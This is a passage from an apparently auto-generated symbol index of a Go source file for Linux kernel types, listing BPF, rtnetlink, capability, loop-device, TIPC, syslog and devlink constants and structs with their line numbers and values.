| BPF_CGROUP_INET4_GETSOCKNAME = 0x1f constant BPF_CGROUP_INET6_GETSOCKNAME (line 2771) | BPF_CGROUP_INET6_GETSOCKNAME = 0x20 constant BPF_XDP_DEVMAP (line 2772) | BPF_XDP_DEVMAP = 0x21 constant BPF_CGROUP_INET_SOCK_RELEASE (line 2773) | BPF_CGROUP_INET_SOCK_RELEASE = 0x22 constant BPF_XDP_CPUMAP (line 2774) | BPF_XDP_CPUMAP = 0x23 constant BPF_SK_LOOKUP (line 2775) | BPF_SK_LOOKUP = 0x24 constant BPF_XDP (line 2776) | BPF_XDP = 0x25 constant BPF_SK_SKB_VERDICT (line 2777) | BPF_SK_SKB_VERDICT = 0x26 constant BPF_SK_REUSEPORT_SELECT (line 2778) | BPF_SK_REUSEPORT_SELECT = 0x27 constant BPF_SK_REUSEPORT_SELECT_OR_MIGRATE (line 2779) | BPF_SK_REUSEPORT_SELECT_OR_MIGRATE = 0x28 constant BPF_PERF_EVENT (line 2780) | BPF_PERF_EVENT = 0x29 constant BPF_TRACE_KPROBE_MULTI (line 2781) | BPF_TRACE_KPROBE_MULTI = 0x2a constant BPF_LSM_CGROUP (line 2782) | BPF_LSM_CGROUP = 0x2b constant BPF_STRUCT_OPS (line 2783) | BPF_STRUCT_OPS = 0x2c constant BPF_NETFILTER (line 2784) | BPF_NETFILTER = 0x2d constant BPF_TCX_INGRESS (line 2785) | BPF_TCX_INGRESS = 0x2e constant BPF_TCX_EGRESS (line 2786) | BPF_TCX_EGRESS = 0x2f constant BPF_TRACE_UPROBE_MULTI (line 2787) | BPF_TRACE_UPROBE_MULTI = 0x30 constant BPF_LINK_TYPE_UNSPEC (line 2788) | BPF_LINK_TYPE_UNSPEC = 0x0 constant BPF_LINK_TYPE_RAW_TRACEPOINT (line 2789) | BPF_LINK_TYPE_RAW_TRACEPOINT = 0x1 constant BPF_LINK_TYPE_TRACING (line 2790) | BPF_LINK_TYPE_TRACING = 0x2 constant BPF_LINK_TYPE_CGROUP (line 2791) | BPF_LINK_TYPE_CGROUP = 0x3 constant BPF_LINK_TYPE_ITER (line 2792) | BPF_LINK_TYPE_ITER = 0x4 constant BPF_LINK_TYPE_NETNS (line 2793) | BPF_LINK_TYPE_NETNS = 0x5 constant BPF_LINK_TYPE_XDP (line 2794) | BPF_LINK_TYPE_XDP = 0x6 constant BPF_LINK_TYPE_PERF_EVENT (line 2795) | BPF_LINK_TYPE_PERF_EVENT = 0x7 constant BPF_LINK_TYPE_KPROBE_MULTI (line 2796) | BPF_LINK_TYPE_KPROBE_MULTI = 0x8 constant BPF_LINK_TYPE_STRUCT_OPS (line 2797) | BPF_LINK_TYPE_STRUCT_OPS = 0x9 constant BPF_LINK_TYPE_NETFILTER (line 2798) | BPF_LINK_TYPE_NETFILTER = 0xa constant BPF_LINK_TYPE_TCX (line 2799) | BPF_LINK_TYPE_TCX = 0xb constant BPF_LINK_TYPE_UPROBE_MULTI (line 2800) | BPF_LINK_TYPE_UPROBE_MULTI = 0xc constant BPF_PERF_EVENT_UNSPEC (line 2801) | BPF_PERF_EVENT_UNSPEC = 0x0 constant BPF_PERF_EVENT_UPROBE (line 2802) | BPF_PERF_EVENT_UPROBE = 0x1 constant BPF_PERF_EVENT_URETPROBE (line 2803) | BPF_PERF_EVENT_URETPROBE = 0x2 constant BPF_PERF_EVENT_KPROBE (line 2804) | BPF_PERF_EVENT_KPROBE = 0x3 constant BPF_PERF_EVENT_KRETPROBE (line 2805) | BPF_PERF_EVENT_KRETPROBE = 0x4 constant BPF_PERF_EVENT_TRACEPOINT (line 2806) | BPF_PERF_EVENT_TRACEPOINT = 0x5 constant BPF_PERF_EVENT_EVENT (line 2807) | BPF_PERF_EVENT_EVENT = 0x6 constant BPF_F_KPROBE_MULTI_RETURN (line 2808) | BPF_F_KPROBE_MULTI_RETURN = 0x1 constant BPF_F_UPROBE_MULTI_RETURN (line 2809) | BPF_F_UPROBE_MULTI_RETURN = 0x1 constant BPF_ANY (line 2810) | BPF_ANY = 0x0 constant BPF_NOEXIST (line 2811) | BPF_NOEXIST = 0x1 constant BPF_EXIST (line 2812) | BPF_EXIST = 0x2 constant BPF_F_LOCK (line 2813) | BPF_F_LOCK = 0x4 constant BPF_F_NO_PREALLOC (line 2814) | BPF_F_NO_PREALLOC = 0x1 constant BPF_F_NO_COMMON_LRU (line 2815) | BPF_F_NO_COMMON_LRU = 0x2 constant BPF_F_NUMA_NODE (line 2816) | BPF_F_NUMA_NODE = 0x4 constant BPF_F_RDONLY (line 2817) | BPF_F_RDONLY = 0x8 constant BPF_F_WRONLY (line 2818) | BPF_F_WRONLY = 0x10 constant BPF_F_STACK_BUILD_ID (line 2819) | BPF_F_STACK_BUILD_ID = 0x20 constant BPF_F_ZERO_SEED (line 2820) | BPF_F_ZERO_SEED = 0x40 constant BPF_F_RDONLY_PROG (line 2821) | BPF_F_RDONLY_PROG = 0x80 constant BPF_F_WRONLY_PROG (line 2822) | BPF_F_WRONLY_PROG = 0x100 constant BPF_F_CLONE (line 2823) | BPF_F_CLONE = 0x200 constant BPF_F_MMAPABLE (line 2824) | BPF_F_MMAPABLE = 0x400 constant BPF_F_PRESERVE_ELEMS (line 2825) | BPF_F_PRESERVE_ELEMS = 0x800 constant BPF_F_INNER_MAP (line 2826) | BPF_F_INNER_MAP = 0x1000 constant BPF_F_LINK (line 2827) | BPF_F_LINK = 0x2000 constant BPF_F_PATH_FD (line 2828) | BPF_F_PATH_FD = 0x4000 constant BPF_STATS_RUN_TIME (line 2829) | BPF_STATS_RUN_TIME = 0x0 constant BPF_STACK_BUILD_ID_EMPTY (line 2830) | BPF_STACK_BUILD_ID_EMPTY = 0x0 constant BPF_STACK_BUILD_ID_VALID (line 2831) | BPF_STACK_BUILD_ID_VALID = 0x1 constant BPF_STACK_BUILD_ID_IP (line 2832) | BPF_STACK_BUILD_ID_IP = 0x2 constant BPF_F_RECOMPUTE_CSUM (line 2833) | BPF_F_RECOMPUTE_CSUM = 0x1 constant BPF_F_INVALIDATE_HASH (line 2834) | BPF_F_INVALIDATE_HASH = 0x2 constant BPF_F_HDR_FIELD_MASK (line 2835) | BPF_F_HDR_FIELD_MASK = 0xf constant BPF_F_PSEUDO_HDR (line 2836) | BPF_F_PSEUDO_HDR = 0x10 constant BPF_F_MARK_MANGLED_0 (line 2837) | BPF_F_MARK_MANGLED_0 = 0x20 constant BPF_F_MARK_ENFORCE (line 2838) | BPF_F_MARK_ENFORCE = 0x40 constant BPF_F_INGRESS (line 2839) | BPF_F_INGRESS = 0x1 constant BPF_F_TUNINFO_IPV6 (line 2840) | BPF_F_TUNINFO_IPV6 = 0x1 constant BPF_F_SKIP_FIELD_MASK (line 2841) | BPF_F_SKIP_FIELD_MASK = 0xff constant BPF_F_USER_STACK (line 2842) | BPF_F_USER_STACK = 0x100 constant BPF_F_FAST_STACK_CMP (line 2843) | BPF_F_FAST_STACK_CMP = 0x200 constant BPF_F_REUSE_STACKID (line 2844) | BPF_F_REUSE_STACKID = 0x400 constant BPF_F_USER_BUILD_ID (line 2845) | BPF_F_USER_BUILD_ID = 0x800 constant BPF_F_ZERO_CSUM_TX (line 2846) | BPF_F_ZERO_CSUM_TX = 0x2 constant BPF_F_DONT_FRAGMENT (line 2847) | BPF_F_DONT_FRAGMENT = 0x4 constant BPF_F_SEQ_NUMBER (line 2848) | BPF_F_SEQ_NUMBER = 0x8 constant BPF_F_NO_TUNNEL_KEY (line 2849) | BPF_F_NO_TUNNEL_KEY = 0x10 constant BPF_F_TUNINFO_FLAGS (line 2850) | BPF_F_TUNINFO_FLAGS = 0x10 constant BPF_F_INDEX_MASK (line 2851) | BPF_F_INDEX_MASK = 0xffffffff constant BPF_F_CURRENT_CPU (line 2852) | BPF_F_CURRENT_CPU = 0xffffffff constant BPF_F_CTXLEN_MASK (line 2853) | BPF_F_CTXLEN_MASK = 0xfffff00000000 constant BPF_F_CURRENT_NETNS (line 2854) | BPF_F_CURRENT_NETNS = -0x1 constant BPF_CSUM_LEVEL_QUERY (line 2855) | BPF_CSUM_LEVEL_QUERY = 0x0 constant BPF_CSUM_LEVEL_INC (line 2856) | BPF_CSUM_LEVEL_INC = 0x1 constant BPF_CSUM_LEVEL_DEC (line 2857) | BPF_CSUM_LEVEL_DEC = 0x2 constant BPF_CSUM_LEVEL_RESET (line 2858) | BPF_CSUM_LEVEL_RESET = 0x3 constant BPF_F_ADJ_ROOM_FIXED_GSO (line 2859) | BPF_F_ADJ_ROOM_FIXED_GSO = 0x1 constant BPF_F_ADJ_ROOM_ENCAP_L3_IPV4 (line 2860) | BPF_F_ADJ_ROOM_ENCAP_L3_IPV4 = 0x2 constant BPF_F_ADJ_ROOM_ENCAP_L3_IPV6 (line 2861) | BPF_F_ADJ_ROOM_ENCAP_L3_IPV6 = 0x4 constant BPF_F_ADJ_ROOM_ENCAP_L4_GRE (line 2862) | BPF_F_ADJ_ROOM_ENCAP_L4_GRE = 0x8 constant BPF_F_ADJ_ROOM_ENCAP_L4_UDP (line 2863) | BPF_F_ADJ_ROOM_ENCAP_L4_UDP = 0x10 constant BPF_F_ADJ_ROOM_NO_CSUM_RESET (line 2864) | BPF_F_ADJ_ROOM_NO_CSUM_RESET = 0x20 constant BPF_F_ADJ_ROOM_ENCAP_L2_ETH (line 2865) | BPF_F_ADJ_ROOM_ENCAP_L2_ETH = 0x40 constant BPF_F_ADJ_ROOM_DECAP_L3_IPV4 (line 2866) | BPF_F_ADJ_ROOM_DECAP_L3_IPV4 = 0x80 constant BPF_F_ADJ_ROOM_DECAP_L3_IPV6 (line 2867) | BPF_F_ADJ_ROOM_DECAP_L3_IPV6 = 0x100 constant BPF_ADJ_ROOM_ENCAP_L2_MASK (line 2868) | BPF_ADJ_ROOM_ENCAP_L2_MASK = 0xff constant BPF_ADJ_ROOM_ENCAP_L2_SHIFT (line 2869) | BPF_ADJ_ROOM_ENCAP_L2_SHIFT = 0x38 constant BPF_F_SYSCTL_BASE_NAME (line 2870) | BPF_F_SYSCTL_BASE_NAME = 0x1 constant BPF_LOCAL_STORAGE_GET_F_CREATE (line 2871) | BPF_LOCAL_STORAGE_GET_F_CREATE = 0x1 constant BPF_SK_STORAGE_GET_F_CREATE (line 2872) | BPF_SK_STORAGE_GET_F_CREATE = 0x1 constant BPF_F_GET_BRANCH_RECORDS_SIZE (line 2873) | BPF_F_GET_BRANCH_RECORDS_SIZE = 0x1 constant BPF_RB_NO_WAKEUP (line 2874) | BPF_RB_NO_WAKEUP = 0x1 constant BPF_RB_FORCE_WAKEUP (line 2875) | BPF_RB_FORCE_WAKEUP = 0x2 constant BPF_RB_AVAIL_DATA (line 2876) | BPF_RB_AVAIL_DATA = 0x0 constant BPF_RB_RING_SIZE (line 2877) | BPF_RB_RING_SIZE = 0x1 constant BPF_RB_CONS_POS (line 2878) | BPF_RB_CONS_POS = 0x2 constant BPF_RB_PROD_POS (line 2879) | BPF_RB_PROD_POS = 0x3 constant BPF_RINGBUF_BUSY_BIT (line 2880) | BPF_RINGBUF_BUSY_BIT = 0x80000000 constant BPF_RINGBUF_DISCARD_BIT (line 2881) | BPF_RINGBUF_DISCARD_BIT = 0x40000000 constant BPF_RINGBUF_HDR_SZ (line 2882) | BPF_RINGBUF_HDR_SZ = 0x8 constant BPF_SK_LOOKUP_F_REPLACE (line 2883) | BPF_SK_LOOKUP_F_REPLACE = 0x1 constant BPF_SK_LOOKUP_F_NO_REUSEPORT (line 2884) | BPF_SK_LOOKUP_F_NO_REUSEPORT = 0x2 constant BPF_ADJ_ROOM_NET (line 2885) | BPF_ADJ_ROOM_NET = 0x0 constant BPF_ADJ_ROOM_MAC (line 2886) | BPF_ADJ_ROOM_MAC = 0x1 constant BPF_HDR_START_MAC (line 2887) | BPF_HDR_START_MAC = 0x0 constant BPF_HDR_START_NET (line 2888) | BPF_HDR_START_NET = 0x1 constant BPF_LWT_ENCAP_SEG6 (line 2889) | BPF_LWT_ENCAP_SEG6 = 0x0 constant BPF_LWT_ENCAP_SEG6_INLINE (line 2890) | BPF_LWT_ENCAP_SEG6_INLINE = 0x1 constant BPF_LWT_ENCAP_IP (line 2891) | BPF_LWT_ENCAP_IP = 0x2 constant BPF_F_BPRM_SECUREEXEC (line 2892) | BPF_F_BPRM_SECUREEXEC = 0x1 constant BPF_F_BROADCAST (line 2893) | BPF_F_BROADCAST = 0x8 constant BPF_F_EXCLUDE_INGRESS (line 2894) | BPF_F_EXCLUDE_INGRESS = 0x10 constant BPF_SKB_TSTAMP_UNSPEC (line 2895) | BPF_SKB_TSTAMP_UNSPEC = 0x0 constant BPF_SKB_TSTAMP_DELIVERY_MONO (line 2896) | BPF_SKB_TSTAMP_DELIVERY_MONO = 0x1 constant BPF_OK (line 2897) | BPF_OK = 0x0 constant BPF_DROP (line 2898) | BPF_DROP = 0x2 constant BPF_REDIRECT (line 2899) | BPF_REDIRECT = 0x7 constant BPF_LWT_REROUTE (line 2900) | BPF_LWT_REROUTE = 0x80 constant BPF_FLOW_DISSECTOR_CONTINUE (line 2901) | BPF_FLOW_DISSECTOR_CONTINUE = 0x81 constant BPF_SOCK_OPS_RTO_CB_FLAG (line 2902) | BPF_SOCK_OPS_RTO_CB_FLAG = 0x1 constant BPF_SOCK_OPS_RETRANS_CB_FLAG (line 2903) | BPF_SOCK_OPS_RETRANS_CB_FLAG = 0x2 constant BPF_SOCK_OPS_STATE_CB_FLAG (line 2904) | BPF_SOCK_OPS_STATE_CB_FLAG = 0x4 constant BPF_SOCK_OPS_RTT_CB_FLAG (line 2905) | BPF_SOCK_OPS_RTT_CB_FLAG = 0x8 constant BPF_SOCK_OPS_PARSE_ALL_HDR_OPT_CB_FLAG (line 2906) | BPF_SOCK_OPS_PARSE_ALL_HDR_OPT_CB_FLAG = 0x10 constant BPF_SOCK_OPS_PARSE_UNKNOWN_HDR_OPT_CB_FLAG (line 2907) | BPF_SOCK_OPS_PARSE_UNKNOWN_HDR_OPT_CB_FLAG = 0x20 constant BPF_SOCK_OPS_WRITE_HDR_OPT_CB_FLAG (line 2908) | BPF_SOCK_OPS_WRITE_HDR_OPT_CB_FLAG = 0x40 constant BPF_SOCK_OPS_ALL_CB_FLAGS (line 2909) | BPF_SOCK_OPS_ALL_CB_FLAGS = 0x7f constant BPF_SOCK_OPS_VOID (line 2910) | BPF_SOCK_OPS_VOID = 0x0 constant BPF_SOCK_OPS_TIMEOUT_INIT (line 2911) | BPF_SOCK_OPS_TIMEOUT_INIT = 0x1 constant BPF_SOCK_OPS_RWND_INIT (line 2912) | BPF_SOCK_OPS_RWND_INIT = 0x2 constant BPF_SOCK_OPS_TCP_CONNECT_CB (line 2913) | BPF_SOCK_OPS_TCP_CONNECT_CB = 0x3 constant BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB (line 2914) | BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB = 0x4 constant BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB (line 2915) | BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB = 0x5 constant BPF_SOCK_OPS_NEEDS_ECN (line 2916) | BPF_SOCK_OPS_NEEDS_ECN = 0x6 constant BPF_SOCK_OPS_BASE_RTT (line 2917) | BPF_SOCK_OPS_BASE_RTT = 0x7 constant BPF_SOCK_OPS_RTO_CB (line 2918) | BPF_SOCK_OPS_RTO_CB = 0x8 constant BPF_SOCK_OPS_RETRANS_CB (line 2919) | BPF_SOCK_OPS_RETRANS_CB = 0x9 constant BPF_SOCK_OPS_STATE_CB (line 2920) | BPF_SOCK_OPS_STATE_CB = 0xa constant BPF_SOCK_OPS_TCP_LISTEN_CB (line 2921) | BPF_SOCK_OPS_TCP_LISTEN_CB = 0xb constant BPF_SOCK_OPS_RTT_CB (line 2922) | BPF_SOCK_OPS_RTT_CB = 0xc constant BPF_SOCK_OPS_PARSE_HDR_OPT_CB (line 2923) | BPF_SOCK_OPS_PARSE_HDR_OPT_CB = 0xd constant BPF_SOCK_OPS_HDR_OPT_LEN_CB (line 2924) | BPF_SOCK_OPS_HDR_OPT_LEN_CB = 0xe constant BPF_SOCK_OPS_WRITE_HDR_OPT_CB (line 2925) | BPF_SOCK_OPS_WRITE_HDR_OPT_CB = 0xf constant BPF_TCP_ESTABLISHED (line 2926) | BPF_TCP_ESTABLISHED = 0x1 constant BPF_TCP_SYN_SENT (line 2927) | BPF_TCP_SYN_SENT = 0x2 constant BPF_TCP_SYN_RECV (line 2928) | BPF_TCP_SYN_RECV = 0x3 constant BPF_TCP_FIN_WAIT1 (line 2929) | BPF_TCP_FIN_WAIT1 = 0x4 constant BPF_TCP_FIN_WAIT2 (line 2930) | BPF_TCP_FIN_WAIT2 = 0x5 constant BPF_TCP_TIME_WAIT (line 2931) | BPF_TCP_TIME_WAIT = 0x6 constant BPF_TCP_CLOSE (line 2932) | BPF_TCP_CLOSE = 0x7 constant BPF_TCP_CLOSE_WAIT (line 2933) | BPF_TCP_CLOSE_WAIT = 0x8 constant BPF_TCP_LAST_ACK (line 2934) | BPF_TCP_LAST_ACK = 0x9 constant BPF_TCP_LISTEN (line 2935) | BPF_TCP_LISTEN = 0xa constant BPF_TCP_CLOSING (line 2936) | BPF_TCP_CLOSING = 0xb constant BPF_TCP_NEW_SYN_RECV (line 2937) | BPF_TCP_NEW_SYN_RECV = 0xc constant BPF_TCP_MAX_STATES (line 2938) | BPF_TCP_MAX_STATES = 0xd constant TCP_BPF_IW (line 2939) | TCP_BPF_IW = 0x3e9 constant TCP_BPF_SNDCWND_CLAMP (line 2940) | TCP_BPF_SNDCWND_CLAMP = 0x3ea constant TCP_BPF_DELACK_MAX (line 2941) | TCP_BPF_DELACK_MAX = 0x3eb constant TCP_BPF_RTO_MIN (line 2942) | TCP_BPF_RTO_MIN = 0x3ec constant TCP_BPF_SYN (line 2943) | TCP_BPF_SYN = 0x3ed constant TCP_BPF_SYN_IP (line 2944) | TCP_BPF_SYN_IP = 0x3ee constant TCP_BPF_SYN_MAC (line 2945) | TCP_BPF_SYN_MAC = 0x3ef constant BPF_LOAD_HDR_OPT_TCP_SYN (line 2946) | BPF_LOAD_HDR_OPT_TCP_SYN = 0x1 constant BPF_WRITE_HDR_TCP_CURRENT_MSS (line 2947) | BPF_WRITE_HDR_TCP_CURRENT_MSS = 0x1 constant BPF_WRITE_HDR_TCP_SYNACK_COOKIE (line 2948) | BPF_WRITE_HDR_TCP_SYNACK_COOKIE = 0x2 constant BPF_DEVCG_ACC_MKNOD (line 2949) | BPF_DEVCG_ACC_MKNOD = 0x1 constant BPF_DEVCG_ACC_READ (line 2950) | BPF_DEVCG_ACC_READ = 0x2 constant BPF_DEVCG_ACC_WRITE (line 2951) | BPF_DEVCG_ACC_WRITE = 0x4 constant BPF_DEVCG_DEV_BLOCK (line 2952) | BPF_DEVCG_DEV_BLOCK = 0x1 constant BPF_DEVCG_DEV_CHAR (line 2953) | BPF_DEVCG_DEV_CHAR = 0x2 constant BPF_FIB_LOOKUP_DIRECT (line 2954) | BPF_FIB_LOOKUP_DIRECT = 0x1 constant BPF_FIB_LOOKUP_OUTPUT (line 2955) | BPF_FIB_LOOKUP_OUTPUT = 0x2 constant BPF_FIB_LOOKUP_SKIP_NEIGH (line 2956) | BPF_FIB_LOOKUP_SKIP_NEIGH = 0x4 constant BPF_FIB_LOOKUP_TBID (line 2957) | BPF_FIB_LOOKUP_TBID = 0x8 constant BPF_FIB_LKUP_RET_SUCCESS (line 2958) | BPF_FIB_LKUP_RET_SUCCESS = 0x0 constant BPF_FIB_LKUP_RET_BLACKHOLE (line 2959) | BPF_FIB_LKUP_RET_BLACKHOLE = 0x1 constant BPF_FIB_LKUP_RET_UNREACHABLE (line 2960) | BPF_FIB_LKUP_RET_UNREACHABLE = 0x2 constant BPF_FIB_LKUP_RET_PROHIBIT (line 2961) | BPF_FIB_LKUP_RET_PROHIBIT = 0x3 constant BPF_FIB_LKUP_RET_NOT_FWDED (line 2962) | BPF_FIB_LKUP_RET_NOT_FWDED = 0x4 constant BPF_FIB_LKUP_RET_FWD_DISABLED (line 2963) | BPF_FIB_LKUP_RET_FWD_DISABLED = 0x5 constant BPF_FIB_LKUP_RET_UNSUPP_LWT (line 2964) | BPF_FIB_LKUP_RET_UNSUPP_LWT = 0x6 constant BPF_FIB_LKUP_RET_NO_NEIGH (line 2965) | BPF_FIB_LKUP_RET_NO_NEIGH = 0x7 constant BPF_FIB_LKUP_RET_FRAG_NEEDED (line 2966) | BPF_FIB_LKUP_RET_FRAG_NEEDED = 0x8 constant BPF_MTU_CHK_SEGS (line 2967) | BPF_MTU_CHK_SEGS = 0x1 constant BPF_MTU_CHK_RET_SUCCESS (line 2968) | BPF_MTU_CHK_RET_SUCCESS = 0x0 constant BPF_MTU_CHK_RET_FRAG_NEEDED (line 2969) | BPF_MTU_CHK_RET_FRAG_NEEDED = 0x1 constant BPF_MTU_CHK_RET_SEGS_TOOBIG (line 2970) | BPF_MTU_CHK_RET_SEGS_TOOBIG = 0x2 constant BPF_FD_TYPE_RAW_TRACEPOINT (line 2971) | BPF_FD_TYPE_RAW_TRACEPOINT = 0x0 constant BPF_FD_TYPE_TRACEPOINT (line 2972) | BPF_FD_TYPE_TRACEPOINT = 0x1 constant BPF_FD_TYPE_KPROBE (line 2973) | BPF_FD_TYPE_KPROBE = 0x2 constant BPF_FD_TYPE_KRETPROBE (line 2974) | BPF_FD_TYPE_KRETPROBE = 0x3 constant BPF_FD_TYPE_UPROBE (line 2975) | BPF_FD_TYPE_UPROBE = 0x4 constant BPF_FD_TYPE_URETPROBE (line 2976) | BPF_FD_TYPE_URETPROBE = 0x5 constant BPF_FLOW_DISSECTOR_F_PARSE_1ST_FRAG (line 2977) | BPF_FLOW_DISSECTOR_F_PARSE_1ST_FRAG = 0x1 constant BPF_FLOW_DISSECTOR_F_STOP_AT_FLOW_LABEL (line 2978) | BPF_FLOW_DISSECTOR_F_STOP_AT_FLOW_LABEL = 0x2 constant BPF_FLOW_DISSECTOR_F_STOP_AT_ENCAP (line 2979) | BPF_FLOW_DISSECTOR_F_STOP_AT_ENCAP = 0x4 constant BPF_CORE_FIELD_BYTE_OFFSET (line 2980) | BPF_CORE_FIELD_BYTE_OFFSET = 0x0 constant BPF_CORE_FIELD_BYTE_SIZE (line 2981) | BPF_CORE_FIELD_BYTE_SIZE = 0x1 constant BPF_CORE_FIELD_EXISTS (line 2982) | BPF_CORE_FIELD_EXISTS = 0x2 constant BPF_CORE_FIELD_SIGNED (line 2983) | BPF_CORE_FIELD_SIGNED = 0x3 constant BPF_CORE_FIELD_LSHIFT_U64 (line 2984) | BPF_CORE_FIELD_LSHIFT_U64 = 0x4 constant BPF_CORE_FIELD_RSHIFT_U64 (line 2985) | BPF_CORE_FIELD_RSHIFT_U64 = 0x5 constant BPF_CORE_TYPE_ID_LOCAL (line 2986) | BPF_CORE_TYPE_ID_LOCAL = 0x6 constant BPF_CORE_TYPE_ID_TARGET (line 2987) | BPF_CORE_TYPE_ID_TARGET = 0x7 constant BPF_CORE_TYPE_EXISTS (line 2988) | BPF_CORE_TYPE_EXISTS = 0x8 constant BPF_CORE_TYPE_SIZE (line 2989) | BPF_CORE_TYPE_SIZE = 0x9 constant BPF_CORE_ENUMVAL_EXISTS (line 2990) | BPF_CORE_ENUMVAL_EXISTS = 0xa constant BPF_CORE_ENUMVAL_VALUE (line 2991) | BPF_CORE_ENUMVAL_VALUE = 0xb constant BPF_CORE_TYPE_MATCHES (line 2992) | BPF_CORE_TYPE_MATCHES = 0xc constant BPF_F_TIMER_ABS (line 2993) | BPF_F_TIMER_ABS = 0x1 constant RTNLGRP_NONE (line 2997) | RTNLGRP_NONE = 0x0 constant RTNLGRP_LINK (line 2998) | RTNLGRP_LINK = 0x1 constant RTNLGRP_NOTIFY (line 2999) | RTNLGRP_NOTIFY = 0x2 constant RTNLGRP_NEIGH (line 3000) | RTNLGRP_NEIGH = 0x3 constant RTNLGRP_TC (line 3001) | RTNLGRP_TC = 0x4 constant RTNLGRP_IPV4_IFADDR (line 3002) | RTNLGRP_IPV4_IFADDR = 0x5 constant RTNLGRP_IPV4_MROUTE (line 3003) | RTNLGRP_IPV4_MROUTE = 0x6 constant RTNLGRP_IPV4_ROUTE (line 3004) | RTNLGRP_IPV4_ROUTE = 0x7 constant RTNLGRP_IPV4_RULE (line 3005) | RTNLGRP_IPV4_RULE = 0x8 constant RTNLGRP_IPV6_IFADDR (line 3006) | RTNLGRP_IPV6_IFADDR = 0x9 constant RTNLGRP_IPV6_MROUTE (line 3007) | RTNLGRP_IPV6_MROUTE = 0xa constant RTNLGRP_IPV6_ROUTE (line 3008) | RTNLGRP_IPV6_ROUTE = 0xb constant RTNLGRP_IPV6_IFINFO (line 3009) | RTNLGRP_IPV6_IFINFO = 0xc constant RTNLGRP_DECnet_IFADDR (line 3010) | RTNLGRP_DECnet_IFADDR = 0xd constant RTNLGRP_NOP2 (line 3011) | RTNLGRP_NOP2 = 0xe constant RTNLGRP_DECnet_ROUTE (line 3012) | RTNLGRP_DECnet_ROUTE = 0xf constant RTNLGRP_DECnet_RULE (line 3013) | RTNLGRP_DECnet_RULE = 0x10 constant RTNLGRP_NOP4 (line 3014) | RTNLGRP_NOP4 = 0x11 constant RTNLGRP_IPV6_PREFIX (line 3015) | RTNLGRP_IPV6_PREFIX = 0x12 constant RTNLGRP_IPV6_RULE (line 3016) | RTNLGRP_IPV6_RULE = 0x13 constant RTNLGRP_ND_USEROPT (line 3017) | RTNLGRP_ND_USEROPT = 0x14 constant RTNLGRP_PHONET_IFADDR (line 3018) | RTNLGRP_PHONET_IFADDR = 0x15 constant RTNLGRP_PHONET_ROUTE (line 3019) | RTNLGRP_PHONET_ROUTE = 0x16 constant RTNLGRP_DCB (line 3020) | RTNLGRP_DCB = 0x17 constant RTNLGRP_IPV4_NETCONF (line 3021) | RTNLGRP_IPV4_NETCONF = 0x18 constant RTNLGRP_IPV6_NETCONF (line 3022) | RTNLGRP_IPV6_NETCONF = 0x19 constant RTNLGRP_MDB (line 3023) | RTNLGRP_MDB = 0x1a constant RTNLGRP_MPLS_ROUTE (line 3024) | RTNLGRP_MPLS_ROUTE = 0x1b constant RTNLGRP_NSID (line 3025) | RTNLGRP_NSID = 0x1c constant RTNLGRP_MPLS_NETCONF (line 3026) | RTNLGRP_MPLS_NETCONF = 0x1d constant RTNLGRP_IPV4_MROUTE_R (line 3027) | RTNLGRP_IPV4_MROUTE_R = 0x1e constant RTNLGRP_IPV6_MROUTE_R (line 3028) | RTNLGRP_IPV6_MROUTE_R = 0x1f constant RTNLGRP_NEXTHOP (line 3029) | RTNLGRP_NEXTHOP = 0x20 constant RTNLGRP_BRVLAN (line 3030) | RTNLGRP_BRVLAN = 0x21 type CapUserHeader (line 3033) | type CapUserHeader struct type CapUserData (line 3038) | type CapUserData struct constant LINUX_CAPABILITY_VERSION_1 (line 3045) | LINUX_CAPABILITY_VERSION_1 = 0x19980330 constant LINUX_CAPABILITY_VERSION_2 (line 3046) | LINUX_CAPABILITY_VERSION_2 = 0x20071026 constant LINUX_CAPABILITY_VERSION_3 (line 3047) | LINUX_CAPABILITY_VERSION_3 = 0x20080522 constant LO_FLAGS_READ_ONLY (line 3051) | LO_FLAGS_READ_ONLY = 0x1 constant LO_FLAGS_AUTOCLEAR (line 3052) | LO_FLAGS_AUTOCLEAR = 0x4 constant LO_FLAGS_PARTSCAN (line 3053) | LO_FLAGS_PARTSCAN = 0x8 constant LO_FLAGS_DIRECT_IO (line 3054) | LO_FLAGS_DIRECT_IO = 0x10 type LoopInfo64 (line 3057) | type LoopInfo64 struct type LoopConfig (line 3072) | type LoopConfig struct type TIPCSocketAddr (line 3079) | type TIPCSocketAddr struct type TIPCServiceRange (line 3084) | type TIPCServiceRange struct type TIPCServiceName (line 3090) | type TIPCServiceName struct type TIPCEvent (line 3096) | type TIPCEvent struct type TIPCGroupReq (line 3104) | type TIPCGroupReq struct constant TIPC_CLUSTER_SCOPE (line 3112) | TIPC_CLUSTER_SCOPE = 0x2 constant TIPC_NODE_SCOPE (line 3113) | TIPC_NODE_SCOPE = 0x3 constant SYSLOG_ACTION_CLOSE (line 3117) | SYSLOG_ACTION_CLOSE = 0 constant SYSLOG_ACTION_OPEN (line 3118) | SYSLOG_ACTION_OPEN = 1 constant SYSLOG_ACTION_READ (line 3119) | SYSLOG_ACTION_READ = 2 constant SYSLOG_ACTION_READ_ALL (line 3120) | SYSLOG_ACTION_READ_ALL = 3 constant SYSLOG_ACTION_READ_CLEAR (line 3121) | SYSLOG_ACTION_READ_CLEAR = 4 constant SYSLOG_ACTION_CLEAR (line 3122) | SYSLOG_ACTION_CLEAR = 5 constant SYSLOG_ACTION_CONSOLE_OFF (line 3123) | SYSLOG_ACTION_CONSOLE_OFF = 6 constant SYSLOG_ACTION_CONSOLE_ON (line 3124) | SYSLOG_ACTION_CONSOLE_ON = 7 constant SYSLOG_ACTION_CONSOLE_LEVEL (line 3125) | SYSLOG_ACTION_CONSOLE_LEVEL = 8 constant SYSLOG_ACTION_SIZE_UNREAD (line 3126) | SYSLOG_ACTION_SIZE_UNREAD = 9 constant SYSLOG_ACTION_SIZE_BUFFER (line 3127) | SYSLOG_ACTION_SIZE_BUFFER = 10 constant DEVLINK_CMD_UNSPEC (line 3131) | DEVLINK_CMD_UNSPEC = 0x0 constant DEVLINK_CMD_GET (line 3132) | DEVLINK_CMD_GET = 0x1 constant DEVLINK_CMD_SET (line 3133) | DEVLINK_CMD_SET = 0x2 constant DEVLINK_CMD_NEW (line 3134) | DEVLINK_CMD_NEW = 0x3 constant DEVLINK_CMD_DEL (line 3135) | DEVLINK_CMD_DEL = 0x4 constant DEVLINK_CMD_PORT_GET (line 3136) 